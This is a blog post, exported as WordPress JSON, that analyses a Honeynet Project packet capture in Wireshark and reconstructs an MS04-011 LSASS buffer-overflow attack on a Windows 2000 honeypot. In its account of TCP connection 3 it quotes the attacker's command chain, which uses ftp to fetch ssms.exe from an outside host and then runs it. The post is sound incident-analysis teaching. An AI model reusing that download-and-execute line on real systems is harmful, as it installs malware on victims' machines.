{"id":1688,"date":"2015-11-25T04:00:36","date_gmt":"2015-11-25T04:00:36","guid":{"rendered":"https:\/\/www.hackmethod.com\/?p=1688"},"modified":"2015-12-06T03:39:43","modified_gmt":"2015-12-06T03:39:43","slug":"malicious-network-traffic-wireshark","status":"publish","type":"post","link":"https:\/\/hackmethod.com\/malicious-network-traffic-wireshark\/","title":{"rendered":"Malicious Network Traffic Analysis with Wireshark"},"content":{"rendered":"<h4>Overview &#8211; Wireshark Workflow<\/h4>\n<p>This is an example of my workflow for examining malicious network traffic. \u00a0The traffic I&#8217;ve chosen is traffic from <a href=\"http:\/\/honeynet.org\/node\/504\" target=\"_blank\">The Honeynet Project<\/a>\u00a0and is one of their challenges captures. \u00a0For small pcaps I like to use Wireshark just because its easier to use. Sometimes I&#8217;ll pull apart large a pcap, grab the TCP stream I want and look at it in Wireshark.<\/p>\n<p>What you use to look at traffic largely depends on what&#8217;s going on. You could run it through snort, bro or SiLK if you wanted and if this pcap was large, that&#8217;s exactly what I would do. This pcap has 348 packets, The Honeynet Project has already carved it out of a much larger pcap for us.<\/p>\n<p>First, my setup, I&#8217;m doing this in a Kali 2.0 VM (Virtual Machine) with my network card disabled. \u00a0I do this because in the event I&#8217;m analyzing something or carve a binary out of the traffic I want to make sure my host operating system does not get infected.<\/p>\n<p><strong>The Challenge:<\/strong><br \/>\nA network trace with attack data is provided. (Note that the IP address of the victim has been changed to hide the true location.) Analyze and answer the following questions:<\/p>\n<ul>\n<li>Which systems (i.e. IP addresses) are involved?\u00a0(2pts)\n<ul>\n<li>I just use Wireshark -&gt; Statistics -&gt; Endpoints -&gt; IP. \u00a0This IP address is located in\u00a0Philadelphia, unknown of it its a true source IP or not at this point.<img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" data-attachment-id=\"1692\" data-permalink=\"https:\/\/hackmethod.com\/malicious-network-traffic-wireshark\/netan-1-1\/\" data-orig-file=\"https:\/\/i0.wp.com\/hackmethod.com\/wp-content\/uploads\/2015\/11\/NetAn-1.1.png?fit=1256%2C584&amp;ssl=1\" data-orig-size=\"1256,584\" data-comments-opened=\"0\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"NetAn 1.1\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/i0.wp.com\/hackmethod.com\/wp-content\/uploads\/2015\/11\/NetAn-1.1.png?fit=300%2C139&amp;ssl=1\" data-large-file=\"https:\/\/i0.wp.com\/hackmethod.com\/wp-content\/uploads\/2015\/11\/NetAn-1.1.png?fit=1024%2C476&amp;ssl=1\" class=\"alignnone wp-image-1692 size-full\" src=\"https:\/\/i0.wp.com\/www.hackmethod.com\/wp-content\/uploads\/2015\/11\/NetAn-1.1.png?resize=1080%2C502&#038;ssl=1\" alt=\"Wireshark Conversations\" width=\"1080\" height=\"502\" srcset=\"https:\/\/i0.wp.com\/hackmethod.com\/wp-content\/uploads\/2015\/11\/NetAn-1.1.png?w=1256&amp;ssl=1 1256w, https:\/\/i0.wp.com\/hackmethod.com\/wp-content\/uploads\/2015\/11\/NetAn-1.1.png?resize=600%2C279&amp;ssl=1 600w, https:\/\/i0.wp.com\/hackmethod.com\/wp-content\/uploads\/2015\/11\/NetAn-1.1.png?resize=300%2C139&amp;ssl=1 300w, https:\/\/i0.wp.com\/hackmethod.com\/wp-content\/uploads\/2015\/11\/NetAn-1.1.png?resize=1024%2C476&amp;ssl=1 1024w, https:\/\/i0.wp.com\/hackmethod.com\/wp-content\/uploads\/2015\/11\/NetAn-1.1.png?resize=730%2C339&amp;ssl=1 730w, https:\/\/i0.wp.com\/hackmethod.com\/wp-content\/uploads\/2015\/11\/NetAn-1.1.png?resize=1070%2C498&amp;ssl=1 1070w\" sizes=\"(max-width: 1080px) 100vw, 1080px\" \/><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<ul>\n<li>What can you find out about the attacking host (e.g., where is it located)? (2pts)\n<ul>\n<li>Simple, I just use\u00a0https:\/\/db-ip.com\/ to locate the IP address.<a href=\"https:\/\/i0.wp.com\/www.hackmethod.com\/wp-content\/uploads\/2015\/11\/NetAn-1.2.png?ssl=1\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" data-attachment-id=\"1693\" data-permalink=\"https:\/\/hackmethod.com\/malicious-network-traffic-wireshark\/netan-1-2\/\" data-orig-file=\"https:\/\/i0.wp.com\/hackmethod.com\/wp-content\/uploads\/2015\/11\/NetAn-1.2.png?fit=1166%2C453&amp;ssl=1\" data-orig-size=\"1166,453\" data-comments-opened=\"0\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"NetAn 1.2\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/i0.wp.com\/hackmethod.com\/wp-content\/uploads\/2015\/11\/NetAn-1.2.png?fit=300%2C117&amp;ssl=1\" data-large-file=\"https:\/\/i0.wp.com\/hackmethod.com\/wp-content\/uploads\/2015\/11\/NetAn-1.2.png?fit=1024%2C398&amp;ssl=1\" class=\"alignnone size-full wp-image-1693\" src=\"https:\/\/i0.wp.com\/www.hackmethod.com\/wp-content\/uploads\/2015\/11\/NetAn-1.2.png?resize=1080%2C420&#038;ssl=1\" alt=\"NetAn 1.2\" width=\"1080\" height=\"420\" srcset=\"https:\/\/i0.wp.com\/hackmethod.com\/wp-content\/uploads\/2015\/11\/NetAn-1.2.png?w=1166&amp;ssl=1 1166w, https:\/\/i0.wp.com\/hackmethod.com\/wp-content\/uploads\/2015\/11\/NetAn-1.2.png?resize=600%2C233&amp;ssl=1 600w, https:\/\/i0.wp.com\/hackmethod.com\/wp-content\/uploads\/2015\/11\/NetAn-1.2.png?resize=300%2C117&amp;ssl=1 300w, https:\/\/i0.wp.com\/hackmethod.com\/wp-content\/uploads\/2015\/11\/NetAn-1.2.png?resize=1024%2C398&amp;ssl=1 1024w, https:\/\/i0.wp.com\/hackmethod.com\/wp-content\/uploads\/2015\/11\/NetAn-1.2.png?resize=730%2C284&amp;ssl=1 730w, https:\/\/i0.wp.com\/hackmethod.com\/wp-content\/uploads\/2015\/11\/NetAn-1.2.png?resize=1070%2C416&amp;ssl=1 1070w\" sizes=\"(max-width: 1080px) 100vw, 1080px\" \/><\/a><\/li>\n<\/ul>\n<\/li>\n<li>How many TCP sessions are contained in the dump file? (2pts)\n<ul>\n<li>I like to use Wireshark -&gt; Statistics -&gt; Conversations -&gt; TCP. We have 5 TCP sessions that were established between the attack and victim, keep in mind Wireshark TCP streams start at 0 so our streams go from 0 &#8211; 4 for a total of 5.<a href=\"https:\/\/i0.wp.com\/www.hackmethod.com\/wp-content\/uploads\/2015\/11\/NetAn-1.3.png?ssl=1\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" data-attachment-id=\"1694\" data-permalink=\"https:\/\/hackmethod.com\/malicious-network-traffic-wireshark\/netan-1-3\/\" data-orig-file=\"https:\/\/i0.wp.com\/hackmethod.com\/wp-content\/uploads\/2015\/11\/NetAn-1.3.png?fit=1262%2C580&amp;ssl=1\" data-orig-size=\"1262,580\" data-comments-opened=\"0\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"NetAn 1.3\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/i0.wp.com\/hackmethod.com\/wp-content\/uploads\/2015\/11\/NetAn-1.3.png?fit=300%2C138&amp;ssl=1\" data-large-file=\"https:\/\/i0.wp.com\/hackmethod.com\/wp-content\/uploads\/2015\/11\/NetAn-1.3.png?fit=1024%2C471&amp;ssl=1\" class=\"alignnone size-full wp-image-1694\" src=\"https:\/\/i0.wp.com\/www.hackmethod.com\/wp-content\/uploads\/2015\/11\/NetAn-1.3.png?resize=1080%2C496&#038;ssl=1\" alt=\"NetAn 1.3\" width=\"1080\" height=\"496\" srcset=\"https:\/\/i0.wp.com\/hackmethod.com\/wp-content\/uploads\/2015\/11\/NetAn-1.3.png?w=1262&amp;ssl=1 1262w, https:\/\/i0.wp.com\/hackmethod.com\/wp-content\/uploads\/2015\/11\/NetAn-1.3.png?resize=600%2C276&amp;ssl=1 600w, https:\/\/i0.wp.com\/hackmethod.com\/wp-content\/uploads\/2015\/11\/NetAn-1.3.png?resize=300%2C138&amp;ssl=1 300w, https:\/\/i0.wp.com\/hackmethod.com\/wp-content\/uploads\/2015\/11\/NetAn-1.3.png?resize=1024%2C471&amp;ssl=1 1024w, https:\/\/i0.wp.com\/hackmethod.com\/wp-content\/uploads\/2015\/11\/NetAn-1.3.png?resize=730%2C335&amp;ssl=1 730w, https:\/\/i0.wp.com\/hackmethod.com\/wp-content\/uploads\/2015\/11\/NetAn-1.3.png?resize=1070%2C492&amp;ssl=1 1070w\" sizes=\"(max-width: 1080px) 100vw, 1080px\" \/><\/a><\/li>\n<\/ul>\n<\/li>\n<li>How long did it take to perform the attack? (2pts)\n<ul>\n<li>Wireshark -&gt; Statistics -&gt; Summary. Total time 16 seconds.<\/li>\n<\/ul>\n<\/li>\n<li>Which operating system was targeted by the attack? And which service? Which vulnerability? (6pts)\n<ul>\n<li>Using wireshark I can see that Samba (SMB) is being used. SMB sends along some OS information when its setting up so if you look at packet 16 in the SMB header you can see Windows 2000. On\u00a0packet 33 you can see a big list of 1&#8217;s and Wireshark reporting a &#8220;long frame&#8221;. If you follow the TCP streams you&#8217;ll also note that this is the end of tcp steam 1. If we take a look at what&#8217;s going on we see that the attacker is sending DsRoleUpgradeDownlevelServer and following it with a buffer overflow. With some quick searching I found that this is exploit <a href=\"https:\/\/technet.microsoft.com\/library\/security\/ms04-011\" target=\"_blank\">MS04-011<\/a>\u00a0which exploits a vulnerable <a href=\"https:\/\/en.wikipedia.org\/wiki\/Local_Security_Authority_Subsystem_Service\" target=\"_blank\">LSASS<\/a> function aka. The Sasser worm.<img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" data-attachment-id=\"1695\" data-permalink=\"https:\/\/hackmethod.com\/malicious-network-traffic-wireshark\/netan-1-4\/\" data-orig-file=\"https:\/\/i0.wp.com\/hackmethod.com\/wp-content\/uploads\/2015\/11\/NetAn-1.4.png?fit=1178%2C746&amp;ssl=1\" data-orig-size=\"1178,746\" data-comments-opened=\"0\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"NetAn 1.4\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/i0.wp.com\/hackmethod.com\/wp-content\/uploads\/2015\/11\/NetAn-1.4.png?fit=300%2C190&amp;ssl=1\" data-large-file=\"https:\/\/i0.wp.com\/hackmethod.com\/wp-content\/uploads\/2015\/11\/NetAn-1.4.png?fit=1024%2C648&amp;ssl=1\" class=\"alignnone wp-image-1695 size-full\" src=\"https:\/\/i0.wp.com\/www.hackmethod.com\/wp-content\/uploads\/2015\/11\/NetAn-1.4.png?resize=1080%2C684&#038;ssl=1\" alt=\"Wireshark\" width=\"1080\" height=\"684\" srcset=\"https:\/\/i0.wp.com\/hackmethod.com\/wp-content\/uploads\/2015\/11\/NetAn-1.4.png?w=1178&amp;ssl=1 1178w, https:\/\/i0.wp.com\/hackmethod.com\/wp-content\/uploads\/2015\/11\/NetAn-1.4.png?resize=600%2C380&amp;ssl=1 600w, https:\/\/i0.wp.com\/hackmethod.com\/wp-content\/uploads\/2015\/11\/NetAn-1.4.png?resize=300%2C190&amp;ssl=1 300w, https:\/\/i0.wp.com\/hackmethod.com\/wp-content\/uploads\/2015\/11\/NetAn-1.4.png?resize=1024%2C648&amp;ssl=1 1024w, https:\/\/i0.wp.com\/hackmethod.com\/wp-content\/uploads\/2015\/11\/NetAn-1.4.png?resize=730%2C462&amp;ssl=1 730w, https:\/\/i0.wp.com\/hackmethod.com\/wp-content\/uploads\/2015\/11\/NetAn-1.4.png?resize=1070%2C678&amp;ssl=1 1070w\" sizes=\"(max-width: 1080px) 100vw, 1080px\" \/><\/li>\n<\/ul>\n<\/li>\n<li>Can you sketch an overview of the general actions performed by the attacker? (6pts)\n<ul>\n<li>TCP Connection 1 &#8211; The attacker initiates and closes\u00a0a TCP connection with the victim. Most likely recon for open 445 port.<\/li>\n<li>TCP Connection 2 &#8211; SMB Connection is established, attacker exploits LSASS with a buffer overflow<\/li>\n<li>TCP Connection 3 &#8211; The following code is ran &#8220;echo open 0.0.0.0 8884 &gt; o&amp;echo user 1 1 &gt;&gt; o &amp;echo get ssms.exe &gt;&gt; o &amp;echo quit &gt;&gt; o &amp;ftp -n -s:o &amp;del \/F \/Q o &amp;ssms.exe\u00a0(&amp;&#8217;s indicate line breaks)<\/li>\n<li>TCP Connection 4 &#8211; A user logs in via a FTP\u00a0backdoor and requests a binary to be downloaded<\/li>\n<li>TCP Connection 5 &#8211; Binary is downloaded to victim machine<\/li>\n<li><a href=\"https:\/\/i0.wp.com\/www.hackmethod.com\/wp-content\/uploads\/2015\/11\/NetAn-1.6.png?ssl=1\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" data-attachment-id=\"1697\" data-permalink=\"https:\/\/hackmethod.com\/malicious-network-traffic-wireshark\/netan-1-6\/\" data-orig-file=\"https:\/\/i0.wp.com\/hackmethod.com\/wp-content\/uploads\/2015\/11\/NetAn-1.6.png?fit=778%2C660&amp;ssl=1\" data-orig-size=\"778,660\" data-comments-opened=\"0\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"NetAn 1.6\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/i0.wp.com\/hackmethod.com\/wp-content\/uploads\/2015\/11\/NetAn-1.6.png?fit=300%2C254&amp;ssl=1\" data-large-file=\"https:\/\/i0.wp.com\/hackmethod.com\/wp-content\/uploads\/2015\/11\/NetAn-1.6.png?fit=778%2C660&amp;ssl=1\" class=\"alignnone wp-image-1697 size-full\" src=\"https:\/\/i0.wp.com\/www.hackmethod.com\/wp-content\/uploads\/2015\/11\/NetAn-1.6.png?resize=778%2C660&#038;ssl=1\" alt=\"Wireshark RAW conversation output\" width=\"778\" height=\"660\" srcset=\"https:\/\/i0.wp.com\/hackmethod.com\/wp-content\/uploads\/2015\/11\/NetAn-1.6.png?w=778&amp;ssl=1 778w, https:\/\/i0.wp.com\/hackmethod.com\/wp-content\/uploads\/2015\/11\/NetAn-1.6.png?resize=600%2C509&amp;ssl=1 600w, https:\/\/i0.wp.com\/hackmethod.com\/wp-content\/uploads\/2015\/11\/NetAn-1.6.png?resize=300%2C254&amp;ssl=1 300w, https:\/\/i0.wp.com\/hackmethod.com\/wp-content\/uploads\/2015\/11\/NetAn-1.6.png?resize=730%2C619&amp;ssl=1 730w\" sizes=\"(max-width: 778px) 100vw, 778px\" \/><\/a><\/li>\n<\/ul>\n<\/li>\n<li>What specific vulnerability was attacked? (2pts)\n<ul>\n<li>MS04-011 LSASS\u00a0DsRoleUpgradeDownlevelServer function<\/li>\n<li><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" data-attachment-id=\"1696\" data-permalink=\"https:\/\/hackmethod.com\/malicious-network-traffic-wireshark\/netan-1-5\/\" data-orig-file=\"https:\/\/i0.wp.com\/hackmethod.com\/wp-content\/uploads\/2015\/11\/NetAn-1.5.png?fit=1044%2C786&amp;ssl=1\" data-orig-size=\"1044,786\" data-comments-opened=\"0\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"NetAn 1.5\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/i0.wp.com\/hackmethod.com\/wp-content\/uploads\/2015\/11\/NetAn-1.5.png?fit=300%2C226&amp;ssl=1\" data-large-file=\"https:\/\/i0.wp.com\/hackmethod.com\/wp-content\/uploads\/2015\/11\/NetAn-1.5.png?fit=1024%2C771&amp;ssl=1\" class=\"alignnone wp-image-1696 size-full\" src=\"https:\/\/i0.wp.com\/www.hackmethod.com\/wp-content\/uploads\/2015\/11\/NetAn-1.5.png?resize=1044%2C786&#038;ssl=1\" alt=\"Wireshark TCP Stream\" width=\"1044\" height=\"786\" srcset=\"https:\/\/i0.wp.com\/hackmethod.com\/wp-content\/uploads\/2015\/11\/NetAn-1.5.png?w=1044&amp;ssl=1 1044w, https:\/\/i0.wp.com\/hackmethod.com\/wp-content\/uploads\/2015\/11\/NetAn-1.5.png?resize=600%2C452&amp;ssl=1 600w, https:\/\/i0.wp.com\/hackmethod.com\/wp-content\/uploads\/2015\/11\/NetAn-1.5.png?resize=300%2C226&amp;ssl=1 300w, https:\/\/i0.wp.com\/hackmethod.com\/wp-content\/uploads\/2015\/11\/NetAn-1.5.png?resize=1024%2C771&amp;ssl=1 1024w, https:\/\/i0.wp.com\/hackmethod.com\/wp-content\/uploads\/2015\/11\/NetAn-1.5.png?resize=356%2C267&amp;ssl=1 356w, https:\/\/i0.wp.com\/hackmethod.com\/wp-content\/uploads\/2015\/11\/NetAn-1.5.png?resize=730%2C550&amp;ssl=1 730w\" sizes=\"(max-width: 1044px) 100vw, 1044px\" \/><\/li>\n<\/ul>\n<\/li>\n<li>Do you think a Honeypot was used to pose as a vulnerable victim? Why? (6pts)\n<ul>\n<li>In an IP header different operating systems will provide different <a href=\"http:\/\/www.netresec.com\/?page=Blog&amp;month=2011-11&amp;post=Passive-OS-Fingerprinting\" target=\"_blank\">time to live values<\/a>. I think its a honeypot because at quick glance the TTL values don&#8217;t match a Windows machine, this machine said it was Windows 2000 in the SMB header, but uses a Linux TTL value of 64.<\/li>\n<li><a href=\"https:\/\/i0.wp.com\/www.hackmethod.com\/wp-content\/uploads\/2015\/11\/NetAn-1.7.png?ssl=1\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" data-attachment-id=\"1698\" data-permalink=\"https:\/\/hackmethod.com\/malicious-network-traffic-wireshark\/netan-1-7\/\" data-orig-file=\"https:\/\/i0.wp.com\/hackmethod.com\/wp-content\/uploads\/2015\/11\/NetAn-1.7.png?fit=811%2C650&amp;ssl=1\" data-orig-size=\"811,650\" data-comments-opened=\"0\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"NetAn 1.7\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/i0.wp.com\/hackmethod.com\/wp-content\/uploads\/2015\/11\/NetAn-1.7.png?fit=300%2C240&amp;ssl=1\" data-large-file=\"https:\/\/i0.wp.com\/hackmethod.com\/wp-content\/uploads\/2015\/11\/NetAn-1.7.png?fit=811%2C650&amp;ssl=1\" class=\"alignnone wp-image-1698 size-full\" src=\"https:\/\/i0.wp.com\/www.hackmethod.com\/wp-content\/uploads\/2015\/11\/NetAn-1.7.png?resize=811%2C650&#038;ssl=1\" alt=\"Wireshark Packet Analysis\" width=\"811\" height=\"650\" srcset=\"https:\/\/i0.wp.com\/hackmethod.com\/wp-content\/uploads\/2015\/11\/NetAn-1.7.png?w=811&amp;ssl=1 811w, https:\/\/i0.wp.com\/hackmethod.com\/wp-content\/uploads\/2015\/11\/NetAn-1.7.png?resize=600%2C481&amp;ssl=1 600w, https:\/\/i0.wp.com\/hackmethod.com\/wp-content\/uploads\/2015\/11\/NetAn-1.7.png?resize=300%2C240&amp;ssl=1 300w, https:\/\/i0.wp.com\/hackmethod.com\/wp-content\/uploads\/2015\/11\/NetAn-1.7.png?resize=730%2C585&amp;ssl=1 730w\" sizes=\"(max-width: 811px) 100vw, 811px\" \/><\/a><\/li>\n<\/ul>\n<\/li>\n<li>Was there malware involved? Whats the name of the malware? (We are not looking for a detailed malware analysis for this challenge) (2pts)\n<ul>\n<li>Yes. By carving the binary out of the pcap and obtaining a sha1 hash of the file Virtual Total Reports it as being titled <a href=\"https:\/\/www.virustotal.com\/en\/file\/b14ccb3786af7553f7c251623499a7fe67974dde69d3dffd65733871cddf6b6d\/analysis\/\" target=\"_blank\">smss.exe with a variety of back door names<\/a>.<\/li>\n<\/ul>\n<\/li>\n<li>Do you think this is a manual or an automated attack? Why? (2pts)\n<ul>\n<li>\u00a0Automated, this happened in 16 seconds. I highly doubt an attacker would have been able to manually scan, exploit, enter 7 commands, download and execute a binary in that time.<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<h4>Summary<\/h4>\n<p>To wrap it all up this was a buffer overflow of a function that was accessible via SMB on port 445. The service was exploited via buffer overflow and then arbitrary commands were allowed be executed on behalf of the attacker. \u00a0I realize that this wasn&#8217;t a walkthrough or the most technical breakdown but hopefully it gives you guys some insight as to how I look at pcaps and how you could reconstruct an attack when looking at network traffic captures.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Overview &#8211; Wireshark Workflow This is an example of my workflow for examining malicious network traffic. \u00a0The traffic I&#8217;ve chosen is traffic from The Honeynet Project\u00a0and is one of their challenges captures. \u00a0For small pcaps I like to use Wireshark just because its easier to use. Sometimes I&#8217;ll pull apart large a pcap, grab the [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_et_pb_use_builder":"","_et_pb_old_content":"","_et_gb_content_width":"","jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[63],"tags":[76,78,77],"class_list":["post-1688","post","type-post","status-publish","format-standard","hentry","category-security","tag-network","tag-pcap","tag-wireshark"],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/p5zY4D-re","_links":{"self":[{"href":"https:\/\/hackmethod.com\/wp-json\/wp\/v2\/posts\/1688","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hackmethod.com\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/hackmethod.com\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/hackmethod.com\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/hackmethod.com\/wp-json\/wp\/v2\/comments?post=1688"}],"version-history":[{"count":3,"href":"https:\/\/hackmethod.com\/wp-json\/wp\/v2\/posts\/1688\/revisions"}],"predecessor-version":[{"id":1700,"href":"https:\/\/hackmethod.com\/wp-json\/wp\/v2\/posts\/1688\/revisions\/1700"}],"wp:attachment":[{"href":"https:\/\/hackmethod.com\/wp-json\/wp\/v2\/media?parent=1688"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/hackmethod.com\/wp-json\/wp\/v2\/categories?post=1688"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/hackmethod.com\/wp-json\/wp\/v2\/tags?post=1688"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}